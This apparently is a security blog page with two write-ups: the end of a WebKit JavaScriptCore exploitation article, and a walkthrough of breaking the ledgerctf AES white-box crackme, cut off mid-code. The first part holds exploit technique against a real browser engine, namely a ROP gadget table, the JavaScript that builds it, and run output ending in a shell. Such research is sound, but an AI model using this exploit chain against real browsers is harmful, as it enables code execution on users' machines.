For this one, we need to broaden our search a bit, but we still find what we need without too much trouble (and have our choice of five results, again with the one we’ll use being the only one listed). Again, objdump and grep are not the best tools for this job, but if it’s stupid and it works…

One takeaway from this section is that libJavaScriptCore is over 12MB of executable code, and this means your bigger problem is figuring out what to look for as opposed to finding it. With that much code, you have an embarrassment of useful gadgets. In general, it made me curious as to the practical utility of fancy gadget finders on larger binaries (at least in cases where the payloads don’t need to be dynamically generated).

In any case, we now have all the pieces we need to trigger and land our exploit.

Putting it all together

To finish this guy off, we need to construct our pseudo jump table. We know we enter our chain with a call [rax+0x48], so that will be our first gadget; then we look at the offset of each gadget’s closing call to determine the next one. This gives us a layout like this:

       +------------------+
rax -> |0xdeadbeefdeadbeef|
       +------------------+
       |       ...        |
       +------------------+
+0x48  |     zero r8      | <- first call, ends in call [rax+0xf8]
       +------------------+
       |       ...        |
       +------------------+
+0x60  |    one gadget    | <- third call, gets us our shell
       +------------------+
       |       ...        |
       +------------------+
+0xf8  |    write stack   | <- second call, ends in call [rax+0x60]
       +------------------+

We construct this array using normal JS, then just chase pointers from the leaks we have until we find the array. In my implementation I just used a magic 8-byte constant which I searched for, effectively performing a big memmem() on the heap. Once it’s all lined up, the dominoes fall and one_gadget gives us our shell :)
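For reference, building the table itself is unremarkable JS -- a sketch, where zero_r8, write_stack and one_gadget are assumed to be Int64 addresses computed from the leaks:

let table = [];
// fill with a searchable magic so the relative read can memmem() the heap
// for the backing butterfly
for (let i = 0; i < 0x20; i++)
    table.push(new Int64('0x1337133713371337').asDouble());
table[0x48 / 8] = zero_r8.asDouble();     // entry point: call [rax+0x48]
table[0xf8 / 8] = write_stack.asDouble(); // zero-r8 gadget ends in call [rax+0xf8]
table[0x60 / 8] = one_gadget.asDouble();  // stack-write gadget ends in call [rax+0x60]
// aim rax at the butterfly base via the Intl.NumberFormat confusion and
// the chain walks itself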

x@webkit:~/babys-first-webkit$ ./jsc zildjian.js
setting up ghetto_memcpy()...
done:
function () {
    [native code]
}

setting up read primitives...
done.

leaking string addr...
string @ 0x00007feac5b96814

leaking jsc base...
reading @ 0x00007feac5b96060
libjsc .data leak: 0x00007feaca218f28
libjsc .text @ 0x00007feac95e8000
libc @ 0x00007feac6496000
one gadget @ 0x00007feac64d7c22

leaking butterfly arena...
reading @ 0x00007feac5b95be8
buttefly arena leak: 0x00007fea8539eaa0

searching for butterfly in butterfly arena...
butterfly search base: 0x00007fea853a8000
found butterfly @ 0x00007fea853a85f8

replacing array search tag with one shot gadget...
setting up take_rip...
done:
function format() {
    [native code]
}
setting up call target: 0x00007fea853a85b0
getting a shell... enjoy :)
$ id
uid=1000(x) gid=1000(x) groups=1000(x),27(sudo)

The exploit is here: zildjian.js. Be warned that while it seems to be 100% deterministic, it is incredibly brittle and includes a bunch of offsets that are specific to my box. Instead of fixing the exploit to make it general purpose, I opted to provide all the info for you to do it yourself at home :)

If you have any questions, or if you have suggestions for better ways to do anything, be it exploit specifics or general approaches please (really) drop me a line on Twitter or IRC. As the length of this article might suggest, I’m happy to discuss this to death, and one of my hopes in writing this all down is that someone will see me doing something stupid and correct me.

Conclusion

With the exploit working, let’s reflect on how this was different from common CTF problems. There are two differences which really stand out to me:

  • The bug is more subtle than a typical CTF problem. This makes sense, as CTF problems are often meant to be understood within a ~48 hour period, while bigger/more complex systems leave more opportunity for mistakes like these.
  • CTF problems tend to scale up difficulty by giving worse exploit primitives, rather than harder bugs to find. We’ve all seen contrived problems where you get execution control in an address space with next to nothing in it, and need to MacGyver your way out. While this can be a fun and useful exercise, I do wish there were good ways to include the other side of the coin.

Some final thoughts:

  • This was significantly harder than I expected. I went in figuring I would have some fairly localized code, find a heap smash, relative write, or UaF and be off to the races. While that may be true for some browser bugs, in this case I needed a deeper understanding of browser internals. My suspicion is that this was not the easiest bug to begin browser exploitation with, but on the upside it was very… educational.
  • Most of the work here was done over a ~3 month period in my free time. The initial setup and research to get a working infoleak took just over a month, then I burned over a month trying to find a way to get an arbitrary write out of fastMalloc. Once I switched to Intl.NumberFormat I landed the exploit quickly.
  • I was surprised by how important object layouts were for exploitation, and how relatively poor the tooling was for finding and visualizing objects that could be instantiated and manipulated from the runtime.
  • With larger codebases such as this one, when dealing with an unknown component or function call I had the most consistent success balancing guessing at what I viewed as likely behavior against reading and understanding the code in depth. I found it was very easy to get wrapped up in guessing how something worked because I was being lazy and didn’t want to read the code, or alternatively to end up reading and understanding huge amounts of code that turned out to be irrelevant to my goals.

Most of these points boil down to “more code to understand makes it more work to exploit”. Like most problems, once you understand the components the solution is fairly simple. With a larger codebase the most time by far was spent reading and playing with the code to understand it better.

I hope you’ve enjoyed this writeup, it would not have been possible without significant assistance from a bunch of people. Thanks to @natashenka for the bugs, @agustingianni for answering over a million questions, @5aelo and @_niklasb for the Phrack article and entertaining my half-drunk questions during CanSec respectively, @0vercl0k who graciously listened to me rant about butterflies at least twenty times, @itszn13 who is definitely the best RPISEC alumnus of all time, and @mongobug who provided helpful ideas and shamed me into finishing the exploit and writeup.

Breaking ledgerctf's AES white-box challenge

Introduction

About a month ago, my mate b0n0n was working on the ledgerctf puzzles and challenged me to have a look at the ctf2 binary. I eventually did and this blogpost discusses the protection scheme and how I broke it. Before diving in though, here is a bit of background.

ledger is a French security company founded in 2014 that specializes in cryptography, cryptocurrencies, and hardware. They recently put three different puzzles online to celebrate the official launch of their bug bounty program. The second challenge, called ctf2, is the one we will be discussing today. ctf2 is an ELF64 binary that is available here for download (if you want to follow along at home). The binary is about 11MB, written in C++, and even has symbols; great.

Let's do it!

The big picture

Recon

The very first thing I’m sure you’ve noticed is how much data is in the binary, as seen in the picture below. It means that either the binary is packed and IDA is struggling to recognize pieces of the binary as code, or it is actually real data.

ida.png

As we already know that the binary hasn’t been stripped, the first hypothesis is most likely wrong. By skimming through the code in the disassembler, nothing really stands out; everything looks healthy. No sign of obfuscation, code encryption or packing of any sort. At this point we are pretty sure we are looking at a pure reverse-engineering challenge, smooth sailing!

Diffusion

The binary expects a serial as input, which is a string composed of 32 hex characters, like this one: 00112233445566778899AABBCCDDEEFF. Then, there is a loop of 16 rounds that walks the serial one byte (two hex characters) at a time and builds 15 blobs, each 16 bytes long; I call them i0, i1, .., i14 (as it's very self explanatory). Each round of this loop initializes one byte of every i (hence the 16 rounds). The current input serial byte is sent through a huge substitution box (which I called sbx and which is 11534336 bytes long). This basically diffuses the input serial into those blobs. If the explanation above wasn't clear enough, here is what it looks like in prettified C code:

while(Idx < 16) {
  sbx++;
  char CurrentByteString[3] = {
    Serial[Idx],
    Serial[Idx + 1],
    0
  };
  Idx += 2LL;
  uint8_t CurrentByte = strtol(CurrentByteString, 0LL, 16);
  i0[sbx[-1]] = CurrentByte;
  i1[sbx[15]] = CurrentByte;
  i2[sbx[31]] = CurrentByte;
  i3[sbx[47]] = CurrentByte;
  i4[sbx[63]] = CurrentByte;
  i5[sbx[79]] = CurrentByte;
  i6[sbx[95]] = CurrentByte;
  i7[sbx[111]] = CurrentByte;
  i8[sbx[127]] = CurrentByte;
  i9[sbx[143]] = CurrentByte;
  i10[sbx[159]] = CurrentByte;
  i11[sbx[175]] = CurrentByte;
  i12[sbx[191]] = CurrentByte;
  i13[sbx[207]] = CurrentByte;
  i14[sbx[223]] = CurrentByte;
}

Confusion

After the above, there is now a bunch of stuff happening that doesn't necessarily make a whole lot of sense at the moment. That doesn't concern me yet though, as I can't see a clear relationship with the input serial bytes or the i's. As those two are the only user-input derived data, they are the only ones I care about for now.

Next, we hit this code:

do
{
  v16 = v15 + 4;
  do
  {
    rd = rand();
    v18 = (unsigned __int8)(((unsigned __int64)rd >> 56) + rd) - ((unsigned int)(rd >> 31) >> 24);
    mask[v15] = v18;
    mask3[v15] = v18;
    shiftedmask[v15++] = v18;
  }
  while ( v15 != v16 );
}
while ( v15 != 16 );

What I learned from this part is that there are new players in town. Basically, three blobs of 16 bytes, respectively called mask, mask3 and shiftedmask, get initialized with values derived from rand(). At first it sure is a bit confusing to see pseudo-randomized values getting involved, but we can assume those operations will get canceled out by some others later; it wouldn't make sense to have a crypto-looking algorithm produce non-deterministic results. The PRNG is seeded with time(NULL).

After this there are a bunch of other operations that we don't care about. You can just see those as black boxes that generate deterministic outputs. It means we will be able to conveniently dump the generated values whenever needed. For what it's worth, it basically mixes a bunch of values inside mask3.

shiftrows((unsigned __int8 (*)[4])shiftedmask);
shiftrows((unsigned __int8 (*)[4])mask3);
v19 = mul3[(unsigned __int8)byte_D03774] ^ mul2[mask3[0]] ^ byte_D03778 ^ byte_D0377C;
v20 = mul3[(unsigned __int8)byte_D0377C] ^ mul2[(unsigned __int8)byte_D03778] ^ byte_D03774 ^ mask3[0];
v21 = mul3[mask3[0]] ^ mul2[(unsigned __int8)byte_D0377C] ^ byte_D03778 ^ byte_D03774;
byte_D03774 = mul3[(unsigned __int8)byte_D03778] ^ mul2[(unsigned __int8)byte_D03774] ^ mask3[0] ^ byte_D0377C;
mask3[0] = v19;
byte_D03778 = v20;
byte_D0377C = v21;
v22 = mul3[(unsigned __int8)byte_D0377D] ^ mul2[(unsigned __int8)byte_D03779] ^ mask3[1] ^ byte_D03775;
v23 = mul3[(unsigned __int8)byte_D03775] ^ mul2[mask3[1]] ^ byte_D03779 ^ byte_D0377D;
v24 = mul3[mask3[1]] ^ mul2[(unsigned __int8)byte_D0377D] ^ byte_D03779 ^ byte_D03775;
byte_D03775 = mul3[(unsigned __int8)byte_D03779] ^ mul2[(unsigned __int8)byte_D03775] ^ mask3[1] ^ byte_D0377D;
mask3[1] = v23;
byte_D03779 = v22;
byte_D0377D = v24;
v25 = mul3[(unsigned __int8)byte_D0377E] ^ mul2[(unsigned __int8)byte_D0377A] ^ byte_D03776 ^ mask3[2];
v26 = mul3[mask3[2]] ^ mul2[(unsigned __int8)byte_D0377E] ^ byte_D0377A ^ byte_D03776;
v27 = mul3[(unsigned __int8)byte_D03776] ^ mul2[mask3[2]] ^ byte_D0377E ^ byte_D0377A;
byte_D03776 = mul3[(unsigned __int8)byte_D0377A] ^ mul2[(unsigned __int8)byte_D03776] ^ byte_D0377E ^ mask3[2];
byte_D0377A = v25;
byte_D0377E = v26;
mask3[2] = v27;
v28 = mul3[(unsigned __int8)byte_D03777] ^ mul2[mask3[3]] ^ byte_D0377F ^ byte_D0377B;
v29 = mul3[(unsigned __int8)byte_D0377F] ^ mul2[(unsigned __int8)byte_D0377B] ^ byte_D03777 ^ mask3[3];
v30 = mul3[mask3[3]] ^ mul2[(unsigned __int8)byte_D0377F] ^ byte_D0377B ^ byte_D03777;
byte_D03777 = mul3[(unsigned __int8)byte_D0377B] ^ mul2[(unsigned __int8)byte_D03777] ^ byte_D0377F ^ mask3[3];
mask3[3] = v28;
byte_D0377B = v29;
byte_D0377F = v30;
*(__m128i *)mask3 = _mm_xor_si128(_mm_load_si128((const __m128i *)mask), *(__m128i *)mask3);

mul3 and mul2 are basically arrays that have been constructed such that mul2[idx] = idx * 2 and mul3[idx] = idx * 3 within GF(2**8).

const uint8_t mul2[256] {
    0x00, 0x02, 0x04, 0x06, 0x08, 0x0a, 0x0c, 0x0e,
    0x10, 0x12, 0x14, 0x16, 0x18, 0x1a, 0x1c, 0x1e,
    0x20, 0x22, 0x24, 0x26, 0x28, 0x2a, 0x2c, 0x2e,
    0x30, 0x32, 0x34, 0x36, 0x38, 0x3a, 0x3c, 0x3e,
    0x40, 0x42, 0x44, 0x46, 0x48, 0x4a, 0x4c, 0x4e,
    0x50, 0x52, 0x54, 0x56, 0x58, 0x5a, 0x5c, 0x5e,
    0x60, 0x62, 0x64, 0x66, 0x68, 0x6a, 0x6c, 0x6e,
    0x70, 0x72, 0x74, 0x76, 0x78, 0x7a, 0x7c, 0x7e,
    0x80, 0x82, 0x84, 0x86, 0x88, 0x8a, 0x8c, 0x8e,
    0x90, 0x92, 0x94, 0x96, 0x98, 0x9a, 0x9c, 0x9e,
    0xa0, 0xa2, 0xa4, 0xa6, 0xa8, 0xaa, 0xac, 0xae,
    0xb0, 0xb2, 0xb4, 0xb6, 0xb8, 0xba, 0xbc, 0xbe,
    0xc0, 0xc2, 0xc4, 0xc6, 0xc8, 0xca, 0xcc, 0xce,
    0xd0, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde,
    0xe0, 0xe2, 0xe4, 0xe6, 0xe8, 0xea, 0xec, 0xee,
    0xf0, 0xf2, 0xf4, 0xf6, 0xf8, 0xfa, 0xfc, 0xfe,
    0x1b, 0x19, 0x1f, 0x1d, 0x13, 0x11, 0x17, 0x15,
    0x0b, 0x09, 0x0f, 0x0d, 0x03, 0x01, 0x07, 0x05,
    0x3b, 0x39, 0x3f, 0x3d, 0x33, 0x31, 0x37, 0x35,
    0x2b, 0x29, 0x2f, 0x2d, 0x23, 0x21, 0x27, 0x25,
    0x5b, 0x59, 0x5f, 0x5d, 0x53, 0x51, 0x57, 0x55,
    0x4b, 0x49, 0x4f, 0x4d, 0x43, 0x41, 0x47, 0x45,
    0x7b, 0x79, 0x7f, 0x7d, 0x73, 0x71, 0x77, 0x75,
    0x6b, 0x69, 0x6f, 0x6d, 0x63, 0x61, 0x67, 0x65,
    0x9b, 0x99, 0x9f, 0x9d, 0x93, 0x91, 0x97, 0x95,
    0x8b, 0x89, 0x8f, 0x8d, 0x83, 0x81, 0x87, 0x85,
    0xbb, 0xb9, 0xbf, 0xbd, 0xb3, 0xb1, 0xb7, 0xb5,
    0xab, 0xa9, 0xaf, 0xad, 0xa3, 0xa1, 0xa7, 0xa5,
    0xdb, 0xd9, 0xdf, 0xdd, 0xd3, 0xd1, 0xd7, 0xd5,
    0xcb, 0xc9, 0xcf, 0xcd, 0xc3, 0xc1, 0xc7, 0xc5,
    0xfb, 0xf9, 0xff, 0xfd, 0xf3, 0xf1, 0xf7, 0xf5,
    0xeb, 0xe9, 0xef, 0xed, 0xe3, 0xe1, 0xe7, 0xe5,
};
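For reference, regenerating these tables is trivial: multiplication by 2 in GF(2**8) is a left shift plus a conditional reduction by the AES polynomial 0x11b, and 3*x is just 2*x ^ x. A quick JavaScript sketch:

function xtime(b) { return ((b << 1) ^ ((b & 0x80) ? 0x1b : 0)) & 0xff; }
const my_mul2 = new Uint8Array(256);
const my_mul3 = new Uint8Array(256);
for (let i = 0; i < 256; i++) {
    my_mul2[i] = xtime(i);      // e.g. my_mul2[0x80] == 0x1b, matching the table
    my_mul3[i] = xtime(i) ^ i;
}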

One thing of interest - maybe - is that there is a small anti-debug in there. The file is opened and read using one of std::vector's constructors that takes an std::istreambuf_iterator as input. Some sort of checksum is generated and will be used later in the schedule routine. What this means is that if you were to patch the binary, the algorithm would end up generating wrong values. Again, this is barely an inconvenience as we can just dump it out and carry on with our lives.

std::basic_ifstream<char,std::char_traits<char>>::basic_ifstream(&v63, *v3, 4LL);
std::vector<unsigned char,std::allocator<unsigned char>>::vector<std::istreambuf_iterator<char,std::char_traits<char>>,void>(
  &v46,
  *(_QWORD **)((char *)&v64 + *(_QWORD *)(v63 - 24)),
  -1,
  0LL,
  -1);
v31 = v46;
if ( (signed int)v47 - (signed int)v46 > 0 )
{
  v32 = 0LL;
  v33 = (unsigned int)(v47 - (_DWORD)v46 - 1) + 1LL;
  do
  {
    v34 = v32 & 0xF;
    v35 = v31[v32++] ^ *((_BYTE *)&crc + v34);
    *((_BYTE *)&crc + v34) = v35;
  }
  while ( v32 != v33 );
}
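De-decompiled, the checksum is just a rolling 16-byte XOR over the file's bytes -- a sketch:

function fileChecksum(bytes) {
    // crc[i & 0xf] accumulates the XOR of every 16th byte of the binary
    const crc = new Uint8Array(16);
    for (let i = 0; i < bytes.length; i++)
        crc[i & 0xf] ^= bytes[i];
    return crc;
}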

Generation

At this point, the 15 i's from above are used to initialize what I called s0, s1, ..., s14; again, 15 blobs of 16 bytes each. They are passed to the schedule function, which performs a lot of arithmetic operations on the array of s's. No need to understand schedule just yet; as far as we are concerned it is a black box that takes s's as input and gives us back different s's as output, period.

All of those 16-byte blobs (s0, ..., s14) are then XOR'ed together (conveniently, XMM registers are 16 bytes long, which allows the compiler to optimize the code manipulating them), and if the resulting xmmword obeys a bunch of constraints then you get the good boy message.

Those constraints look like this:

h1 = mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned __int64)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8);
h2 = mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned __int64)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8);
if ( BYTE6(h2) == 'i'
  && BYTE5(h2) == '7'
  && BYTE4(h2) == '\x13'
  && (mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned int)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 24 == 66
  && (unsigned __int8)((mxor.m128i_u8[2] | ((mxor.m128i_u8[6] | ((mxor.m128i_u8[10] | ((mxor.m128i_u8[14] | ((mxor.m128i_u8[3] | ((mxor.m128i_u8[7] | ((mxor.m128i_u8[11] | ((unsigned int)mxor.m128i_u8[15] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 16) == 105
  && BYTE1(h2) == 55
  && mxor.m128i_i8[2] == 19
  && HIBYTE(h1) == 66
  && BYTE6(h1) == 105
  && BYTE5(h1) == 55
  && BYTE4(h1) == 19
  && (mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned int)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 24 == 66
  && (unsigned __int8)((mxor.m128i_u8[0] | ((mxor.m128i_u8[4] | ((mxor.m128i_u8[8] | ((mxor.m128i_u8[12] | ((mxor.m128i_u8[1] | ((mxor.m128i_u8[5] | ((mxor.m128i_u8[9] | ((unsigned int)mxor.m128i_u8[13] << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) << 8)) >> 16) == 105
  && BYTE1(h1) == 55
  && mxor.m128i_i8[0] == 19
  && h2 >> 56 == 66 )
{
  puts("**** Login Successful ****");
  v42 = 0;
}
else
{
  puts("**** Login Failed ****");
  v42 = 1;
}

This garbage simply translates to win = (mxor == 0x42424242696969693737373713131313) :).
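Or byte for byte, in memory order (a sketch of the final check):

function isWin(mxor) { // mxor: the 16-byte XOR of s0 ^ s1 ^ ... ^ s14
    const want = [0x13, 0x13, 0x13, 0x13, 0x37, 0x37, 0x37, 0x37,
                  0x69, 0x69, 0x69, 0x69, 0x42, 0x42, 0x42, 0x42];
    return want.every((b, i) => mxor[i] === b);
}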

Zooming in

It is now a good time to zoom in and get our hands dirty a little. We sort of know what we need to achieve, but we are unsure of how to get there. We know we have some dumping to do: mask, mask3, shiftedmask, crc, sbx, mul2 and mul3. Easy. Mechanical.

The most important outstanding unknown is the schedule function; you can consider it the heart of the challenge. So let's dig into it.

schedule

At first sight, the function doesn't look too bad, which is always nice. The first part of the function randomly selects one of the s variables (the variable i is used to index into the states array where all the s's live).

for(i = rand() % 15; scheduling[i] == 40; i = rand() % 15);
nround = scheduling[i];

The switch case that follows applies one type of (arithmetic) transformation to the chosen s variable. In order to track the number of rounds already applied to each s variable, an array called scheduling is used. The algorithm stops when forty rounds have been applied to every s. It's also worth pointing out that there's a small anti-debugging trick here: a timer is started at the beginning of the round (t1) and stopped at the end (t2). If any abnormal delay between t1 and t2 is discovered, the later computations will produce wrong results.

We can observe 6 different types of operations in the switch case. Some of them look very easily invertible and some others would need some more work. At this point, it reminds me a lot of this AES whitebox I analyzed back in 2013; this one doesn't have any obfuscation, which makes it much easier to deal with. What I did at the time was pretty simple: divide and conquer. I broke down each round into four pieces. Each of those quarter rounds worked as a black box function that took 4 bytes of input and generated 4 bytes of output (as a result each round would generate 16 bytes/128 bits). I needed to find the 4 bytes of input that would give me the 4 bytes of output I wanted. Solving those quarters could be done simultaneously, and starting from the desired output you could walk back from round N to round N-1. That was basically my plan for ctf2.

At this point I had already ripped the schedule function out into my own program. I cleaned up the code and made sure it produced the same results as the program itself (always fun to debug). In other words, I was ready to go forward with the analysis of all the arithmetic rounds.

case 0: encoding

This case is as simple as it gets as you can see below:

case 0:
  s0[i] = _mm_xor_si128(_mm_load_si128(&s0[i]), *(__m128i *)mask);
  break;

As a result, inverting it is a simple XOR operation:

void reverse_0(Slot_t &Output, Slot_t &Input) {
    Input = _mm_xor_si128(_mm_load_si128(&Output), mask);
}

case 1, 5, 9, 13, 17, 21, 25, 29, 33, 37: SubBytes

This case can look a bit more intimidating compared to the previous one (lol). Here is how it looks once I have cleaned it up and prettified it a bit:

case 1:
case 5:
case 9:
case 13:
case 17:
case 21:
case 25:
case 29:
case 33:
case 37: {
    v54 = nround >> 2;
    v55 = Slot->m128i_u8[0];
    v77.m128i_u64[0] = mask.m128i_u8[0];
    v56 = v54;
    v54 <<= 20;
    v79 = mask.m128i_u8[1];
    v81 = mask.m128i_u8[2];
    v57 = &sboxes[256 * (v55 + (v56 << 12))];
    v58 = Slot->m128i_u8[1];
    v80 = &sboxes[256 * v58 + v54];
    v60 = Slot->m128i_u8[2];
    v61 = &sboxes[256 * v60 + v54];
    v62 = Slot->m128i_u8[3];
    v83 = &sboxes[256 * v62 + v54];
    v64 = Slot->m128i_u8[4];
    v84 = &sboxes[256 * v64 + v54];
    v65 = Slot->m128i_u8[6];
    v85 = &sboxes[256 * uint64_t(Slot->m128i_u8[5]) + v54];
    v66 = &sboxes[256 * v65 + v54];
    v67 = Slot->m128i_u8[7];
    v68 = &sboxes[256 * v67 + v54];
    v69 = Slot->m128i_u8[8];
    v88 = mask.m128i_u8[8];
    v89 = &sboxes[256 * v69 + v54];
    v90 = mask.m128i_u8[9];
    v70 = v54 + (uint64_t(Slot->m128i_u8[9]) << 8);
    v92 = mask.m128i_u8[10];
    v91 = &sboxes[v70];
    v71 = Slot->m128i_u8[10];
    v94 = mask.m128i_u8[11];
    v96 = mask.m128i_u8[12];
    v93 = &sboxes[256 * v71 + v54];
    v72 = Slot->m128i_u8[11];
    v98 = mask.m128i_u8[13];
    v95 = &sboxes[256 * v72 + v54];
    v73 = Slot->m128i_u8[12];
    v100 = mask.m128i_u8[14];
    v97 = &sboxes[256 * v73 + v54];
    v99 = &sboxes[256 * uint64_t(Slot->m128i_u8[13]) + v54];
    v101 = &sboxes[256 * uint64_t(Slot->m128i_u8[14]) + v54];
    Slot->m128i_u8[0] = v57[mask.m128i_u8[0]];
    Slot->m128i_u8[1] = v80[mask.m128i_u8[1] + 0x10000];
    Slot->m128i_u8[2] = v61[mask.m128i_u8[2] + 0x20000];
    Slot->m128i_u8[3] = v83[mask.m128i_u8[3] + 196608];
    Slot->m128i_u8[4] = v84[mask.m128i_u8[4] + 0x40000];
    Slot->m128i_u8[5] = v85[mask.m128i_u8[5] + 327680];
    Slot->m128i_u8[6] = v66[mask.m128i_u8[6] + 393216];
    Slot->m128i_u8[7] = v68[mask.m128i_u8[7] + 458752];
    Slot->m128i_u8[8] = v89[mask.m128i_u8[8] + 0x80000];
    Slot->m128i_u8[9] = v91[mask.m128i_u8[9] + 589824];
    Slot->m128i_u8[10] = v93[mask.m128i_u8[10] + 655360];
    Slot->m128i_u8[11] = v95[mask.m128i_u8[11] + 720896];
    Slot->m128i_u8[12] = v97[mask.m128i_u8[12] + 786432];
    Slot->m128i_u8[13] = v99[mask.m128i_u8[13] + 851968];
    Slot->m128i_u8[14] = v101[mask.m128i_u8[14] + 917504];
    Slot->m128i_u8[15] = sboxes[256 * uint64_t(Slot->m128i_u8[15]) + 983040 + v54 + mask.m128i_u8[15]];
    *Slot = _mm_xor_si128(*Slot, crc);
    break;
}

The thing I always focus on is the relationship between the input and output bytes. Remember that each round works as a function that takes a 16-byte blob as input (a Slot_t in my code) and returns another 16-byte blob as output. As we are interested in writing a function that can find an input that generates a specific output, it is very important to identify how the output is built and which input bytes are used to build it.

Let's have a closer look at how the first byte of the output is generated. We start from the end of the function and follow the references back until we encounter a byte from the input state. In this case we trace back where v57 is coming from, and then v55 and v56. v55 is the first byte of the input state, great. v56 is a number encoding the round number. We don't necessarily care about it as of now, but it's good to realize that the round number is a parameter of this function, and not exclusively the input bytes. OK, so we know that the first byte of the output is built via the first byte of the input, easy. Simpler than I first expected when looking at the Hex-Rays output, to be honest. But I'll take simple :).

If you repeat the above steps for every byte, you basically realize that each byte of the output is dependent on one single byte of input. They are all independent from one another, which is even nicer. What this means is that we can very easily brute-force an input value to generate a specific output value. That's great because it is ... very cheap to compute; so cheap that we don't even bother optimizing and we move on to the next case.
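Tracing the indexing, each output byte distills down to a single table lookup (a sketch, assuming sboxes, mask and crc have been dumped into typed arrays):

function subBytesByte(nround, i, input_byte) {
    const base = ((nround >> 2) << 20) + (i << 16);
    return sboxes[base + (input_byte << 8) + mask[i]] ^ crc[i];
}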

In theory we could even parallelize the below, but it's probably not worth doing as it's already fast.

void reverse_37(const uint32_t nround, Slot_t &Output, Slot_t &Input) {
    uint8_t is[16];
    for (uint32_t i = 0; i < 16; ++i) {
        for (uint32_t c = 0; c < 0x100; ++c) {
            Input.m128i_u8[i] = c;
            round(nround, &Input);
            if (Input.m128i_u8[i] == Output.m128i_u8[i]) {
                is[i] = c;
                break;
            }
        }
    }
    memcpy(Input.m128i_u8, is, 16);
}

Funny enough, if you patched the challenge binary this is yet another spot where things would go wrong. The crc value is used at the end of the function to XOR the output state and would pollute your results here, sneaky :).

case 2, 6, 10, 14, 18, 22, 26, 30, 34, 38: ShiftRows

Not bad, we already figured out two cases out of the six. This case doesn't look too bad either, it is pretty short and writing an inverse looks easy enough:

case 2:
case 6:
case 10:
case 14:
case 18:
case 22:
case 26:
case 30:
case 34:
case 38: {
    v42 = Slot->m128i_u8[6];
    v43 = Slot->m128i_u8[4];
    v44 = Slot->m128i_u8[5];
    Slot->m128i_u8[6] = Slot->m128i_u8[7];
    Slot->m128i_u8[5] = v42;
    v45 = Slot->m128i_u8[8];
    v46 = Slot->m128i_u8[11];
    Slot->m128i_u8[4] = v44;
    Slot->m128i_u8[7] = v43;
    v47 = Slot->m128i_u8[10];
    v48 = Slot->m128i_u8[9];
    Slot->m128i_u8[10] = v45;
    Slot->m128i_u8[9] = v46;
    v49 = Slot->m128i_u8[13];
    v50 = Slot->m128i_u8[12];
    Slot->m128i_u8[8] = v47;
    Slot->m128i_u8[11] = v48;
    v51 = Slot->m128i_u8[15];
    v52 = Slot->m128i_u8[14];
    Slot->m128i_u8[13] = v50;
    Slot->m128i_u8[14] = v49;
    Slot->m128i_u8[12] = v51;
    Slot->m128i_u8[15] = v52;
    break;
}

Clearly, just by quickly looking at this function, you understand that it is some sort of shuffling operation. For whatever reason, this is the type of brain gymnastics that I am not good at. The trick I usually use is to give it an input that looks like this: \x00\x01\x02\x03... and observe the result.

void test_reverse38() {
    const uint8_t Input[16] {
        0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
        0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f
    };
    Slot_t InputSlot;
    memcpy(&InputSlot.m128i_u8, Input, 16);
    round(38, &InputSlot);
    hexdump(stdout, &InputSlot.m128i_u8, 16);
}

This is what we get if we apply the above trick:

0000:   00 01 02 03 05 06 07 04   0A 0B 08 09 0F 0C 0D 0E    ................

From here, it's much easier (for me at least) to figure out the effect of the shuffling. For example, we already know we don't need to do anything with the first four bytes as they haven't been shuffled. We know we need to take Output[7] and put it inside Input[4], Output[4] in Input[5], and so on and so forth. After a bit of mental gymnastics I end up with this routine:

void reverse_38(Slot_t &Output, Slot_t &Input) {
    // Bytes 0-3 are untouched; undo the shuffles of the three other groups.
    uint8_t s4 = Output.m128i_u8[4];
    Output.m128i_u8[4] = Output.m128i_u8[7];
    uint8_t s5 = Output.m128i_u8[5];
    Output.m128i_u8[5] = s4;
    uint8_t s6 = Output.m128i_u8[6];
    Output.m128i_u8[6] = s5;
    Output.m128i_u8[7] = s6;
    uint8_t s8 = Output.m128i_u8[8];
    Output.m128i_u8[8] = Output.m128i_u8[10];
    uint8_t s9 = Output.m128i_u8[9];
    Output.m128i_u8[9] = Output.m128i_u8[11];
    Output.m128i_u8[10] = s8;
    Output.m128i_u8[11] = s9;
    uint8_t s12 = Output.m128i_u8[12];
    Output.m128i_u8[12] = Output.m128i_u8[13];
    Output.m128i_u8[13] = Output.m128i_u8[14];
    Output.m128i_u8[14] = Output.m128i_u8[15];
    Output.m128i_u8[15] = s12;
    memcpy(Input.m128i_u8, Output.m128i_u8, 16);
}

Next one!

case 3, 7, 11, 15, 19, 23, 27, 31, 35: MixColumns

This case is basically the most annoying one. At first sight, it looks very similar to the case 1 we analyzed earlier, but... not quite.

case 3:
case 7:
case 11:
case 15:
case 19:
case 23:
case 27:
case 31:
case 35: {
    v7 = Slot->m128i_u8[0];
    v8 = Slot->m128i_u8[4];
    v9 = Slot->m128i_u8[1];
    v10 = Slot->m128i_u8[5];
    v11 = Slot->m128i_u8[14] ^ Slot->m128i_u8[10];
    v12 = mul3[v8] ^ mul2[v7] ^ Slot->m128i_u8[12] ^ Slot->m128i_u8[8];
